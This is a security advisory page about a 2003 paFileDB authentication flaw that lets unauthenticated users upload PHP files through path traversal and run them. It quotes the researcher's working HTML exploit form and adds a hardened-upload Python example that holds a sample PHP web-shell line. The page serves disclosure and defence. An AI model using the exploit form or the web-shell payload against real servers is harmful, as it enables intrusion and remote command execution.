SecurityTracker.com
Category:   Application (Generic)  >   paFileDB Vendors:   PHP Arena
paFileDB Authentication Flaw Lets Remote Users Upload and Execute Arbitrary Code
SecurityTracker Alert ID:  1007295
SecurityTracker URL:  http://securitytracker.com/id/1007295
CVE Reference:   GENERIC-MAP-NOMATCH (no CVE identifier was assigned)
Date:  Jul 24 2003
Impact:   Execution of arbitrary code via network, Modification of user information, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 3.1 and prior versions
Description:   A vulnerability was reported in paFileDB. A remote user can upload a file of their choosing to the server and then request it over HTTP so that the web server executes it.

It is reported that the "/includes/team/file.php" script does not verify that the requester holds a valid, authenticated session before it handles an upload (the report notes that other scripts may be affected as well). A remote user can therefore submit a multipart POST request directly to that script to upload a file containing arbitrary PHP code. The client-supplied "userfile_name" parameter is used in the destination path, and the report shows it set to a "../" sequence so that the file lands in a directory of the attacker's choosing. Once the file sits under the web root, an ordinary HTTP request for it causes the web server to run the PHP code, which can in turn invoke operating system commands.

The vendor was reportedly notified on June 26, 2003.

Impact:   A remote user who holds no valid credentials can upload arbitrary PHP code to the system and execute it, including operating system commands, with the privileges of the web server process.
Solution:   The vendor has released a patch, available at:

http://forums.phparena.net/index.php?act=ST&f=26&t=2170

Vendor URL:  forums.phparena.net/index.php?act=ST&f=26&t=2170
Cause:   Authentication error
Underlying OS:  Linux (Any), UNIX (Any)
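The report's form is the whole exploit: an unauthenticated POST with a client-chosen file name that walks out of the intended directory. The following Python is an added example, not paFileDB's code and not the vendor's patch; it models the checks a corrected upload handler needs, namely an authenticated admin session before anything else, reduction of the client name to a single vetted path component, an extension allow-list that refuses anything the web server could execute (so ".php", and also "shell.php.txt"), and a realpath check that the destination stayed inside the upload root. The request shape, the allow-list and the payloads are assumptions constructed for the demonstration; the first case replays the "../../../uploads/makeawish" name from the report.

```python
"""Hardened upload policy for a paFileDB-style admin upload (added example).

Not paFileDB code. It models the checks the advisory says
/includes/team/file.php lacked: (1) refuse the request unless the caller
holds an authenticated admin session, and (2) never let a client-controlled
name such as "../../../uploads/makeawish" pick the destination directory or
place executable content (.php) under the web root. The request shape, the
extension allow-list and the sample payloads are assumptions for the demo.
"""
import os
import re
import tempfile
from dataclasses import dataclass

# Assumed allow-list of download-archive extensions; tighten for a real site.
ALLOWED_EXTENSIONS = {"zip", "gz", "txt", "pdf"}
# Any of these anywhere after the first dot could let Apache/PHP execute the
# upload (e.g. "shell.php", or "shell.php.txt" under mod_mime's multi-suffix
# handling), so they are refused in every position.
EXECUTABLE_MARKERS = re.compile(r"^(php\d*|phtml|phar|cgi|pl|sh)$", re.I)


@dataclass
class UploadRequest:
    """Constructed stand-in for the multipart POST: session state,
    the client-supplied file name and the file bytes."""
    authenticated_admin: bool
    client_filename: str
    content: bytes


class UploadRejected(Exception):
    pass


def safe_filename(client_filename: str) -> str:
    """Reduce a client name to one path component and vet it."""
    # Drop every directory part; handles "../", "/" and "\" alike.
    name = os.path.basename(client_filename.replace("\\", "/"))
    if name in ("", ".", ".."):
        raise UploadRejected("no file name")
    if not re.fullmatch(r"[A-Za-z0-9][A-Za-z0-9._-]{0,99}", name):
        raise UploadRejected("disallowed characters in file name")
    parts = name.split(".")
    if len(parts) < 2:
        raise UploadRejected("file name needs an allow-listed extension")
    if any(EXECUTABLE_MARKERS.match(p) for p in parts[1:]):
        raise UploadRejected("executable extension")
    if parts[-1].lower() not in ALLOWED_EXTENSIONS:
        raise UploadRejected("extension not allow-listed")
    return name


def store_upload(req: UploadRequest, upload_root: str) -> str:
    """Authorize, vet the name, confine the path, then write the bytes.

    Returns the absolute destination path; raises UploadRejected otherwise.
    Nothing touches the disk before every check has passed.
    """
    if not req.authenticated_admin:
        raise UploadRejected("admin session required")
    name = safe_filename(req.client_filename)
    root = os.path.realpath(upload_root)
    dest = os.path.realpath(os.path.join(root, name))
    # Belt and braces: even after basename(), confirm we stayed in root.
    if os.path.dirname(dest) != root:
        raise UploadRejected("destination escapes upload root")
    # O_EXCL: never overwrite an existing file (no clobbering config or index).
    fd = os.open(dest, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o644)
    with os.fdopen(fd, "wb") as fh:
        fh.write(req.content)
    return dest


def outcome(req: UploadRequest, upload_root: str) -> str:
    """Run one request through store_upload; report 'stored' or the reason."""
    try:
        store_upload(req, upload_root)
        return "stored"
    except UploadRejected as exc:
        return f"rejected: {exc}"


def demo() -> dict:
    """Replay the advisory's cases against a temporary upload root."""
    php = b"<?php system($_GET['c']); ?>"  # constructed payload, never executed here
    cases = {
        "unauthenticated traversal (the report's form)":
            UploadRequest(False, "../../../uploads/makeawish", php),
        "authenticated but traversal, no extension":
            UploadRequest(True, "../../../uploads/makeawish", php),
        "authenticated, .php disguised as .txt":
            UploadRequest(True, "shell.php.txt", php),
        "authenticated, legitimate archive":
            UploadRequest(True, "tool-1.0.zip", b"PK\x03\x04constructed"),
    }
    with tempfile.TemporaryDirectory() as root:
        return {label: outcome(req, root) for label, req in cases.items()}


if __name__ == "__main__":
    for label, result in demo().items():
        print(f"{label}: {result}")
```

The session check comes first so that an unauthenticated request never reaches the file-name logic at all; the name and path checks are kept separate because each covers a different failure (basename() defeats traversal, the allow-list defeats code execution, realpath() catches anything the first two missed). Storing uploads outside the document root, or under a directory where script execution is disabled, remains the stronger defence and is compatible with this code.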

Message History:   None.


 Source Message Contents

Subject:  paFileDB 3.1



hola,

paFileDB 3.1 (http://www.phparena.net) allows arbitrary file-upload and os-command execution.

(security report attached)


nice day,
mEi


-- 
WebSec.org / Martin Eiszner
Gurkgasse 49/Top14
1140 Vienna
Austria / EUROPE

mei@websec.org
http://www.websec.org
tel: 0043 699 121772 37




============================
Security REPORT paFileDB 3.1
============================

Product:	paFileDB Version 3.1 (and earlier)
Vulnerabilities:	arbitrary file-upload, path-traversal, arbitrary OS command-execution
Vuln.-classes:	http://www.owasp.org/asac/parameter_manipulation/forms.shtml
		http://www.owasp.org/asac/input_validation/os.shtml
		http://www.owasp.org/asac/input_validation/pt.shtml
Vendor:		php arena (http://www.phparena.net/)
Vendor-Status:	contacted through mail form (http://www.phparena.net/mail.php) 26.06.2003
Vendor-Patch:	http://forums.phparena.net/index.php?act=ST&f=26&t=2170

Exploitable:
Local:		NO
Remote:		YES

============
Introduction
============

(taken from website)
---*---
paFileDB is designed to allow webmasters to have a database of files for download on their site. To add a download, all you do is upload the file using FTP or whatever method you use, log into paFileDB's admin center, and fill out a form to add a file.
---*---


=====================
Vulnerability Details
=====================


1) ARBITRARY FILE UPLOAD
========================

the script "/includes/team/file.php" (and maybe others) does not check for a valid session.
therefore it is possible to upload arbitrary files by creating/modifying a single form-parameter.

Form-example:
---*---
<html><body>
<!-- posts straight to the team upload script; no session cookie is sent -->
<form enctype="multipart/form-data" method="POST" action="http://srv/pafiledb/includes/team/file.php">
<input name="userfile" type="file"><br>
<!-- client-chosen destination name; the "../" sequence leaves the intended directory -->
<input name="userfile_name" type="text" value="../../../uploads/makeawish"><br>
<input type="hidden" name="action" value="team">
<input type="hidden" name="tm" value="file">
<input type="hidden" name="file" value="upload">
<input type="hidden" name="upload" value="do">
<input type="submit" name="submit" value="doit">
</form>
</body></html>
---*---

2) ARBITRARY OS-COMMAND EXECUTION
=================================

by uploading program- or script-files.



Severity:	HIGH 


=======
Remarks
=======

typical php-upload problem

====================
Recommended Hotfixes
====================

software patch.


EOF Martin Eiszner / @2003WebSec.org


=======
Contact
=======

WebSec.org / Martin Eiszner
Gurkgasse 49/Top14
1140 Vienna

Austria / EUROPE

mei@websec.org
http://www.websec.org



Copyright 2021, SecurityGlobal.net LLC